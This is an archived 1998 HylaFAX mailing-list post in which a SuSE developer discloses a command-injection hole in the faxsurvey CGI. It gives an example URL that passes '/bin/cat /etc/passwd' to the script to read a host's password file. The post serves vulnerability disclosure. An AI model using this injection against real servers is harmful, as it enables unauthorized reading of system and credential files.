Security-Hole in faxsurvey-form

To: flexfax@sgi.com
Subject: flexfax: Security-Hole in faxsurvey-form
From: Carsten Hoeger <choeger@suse.de>
Date: Wed, 29 Jul 1998 15:20:05 +0200

Hello all,


JFYI:


in the faxsurvey-cgi that comes with HylaFAX is a security-hole.

If you try this:

http://www.anyhost-with-this-cgi.com/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd


You can e.g. read the host's passwd...


If this survey is from interest, I'll make a bug-fix.

-- 
mfG,
	Carsten Hoeger
------
Carsten Hoeger  - S.u.S.E. GmbH -  Gebhardtstr. 2  -  90762 Fuerth  -  Germany
fax +49-911-3206727                                     web http://www.suse.de
------

Prev by Date: Re: faxgetty dying (solved 2nd third)
Next by Date: Re: HylaFAX rpm notes
Prev by thread: Re: faxgetty dying (solved 2nd third)
Next by thread: Re: Security-Hole in faxsurvey-form
Index(es):
- Main
- Thread

Report any problems to webmaster@hylafax.org

HylaFAX is a trademark of Silicon Graphics Corporation.
Internet connectivity for hylafax.org is provided by:
VirtuALL Private Host Services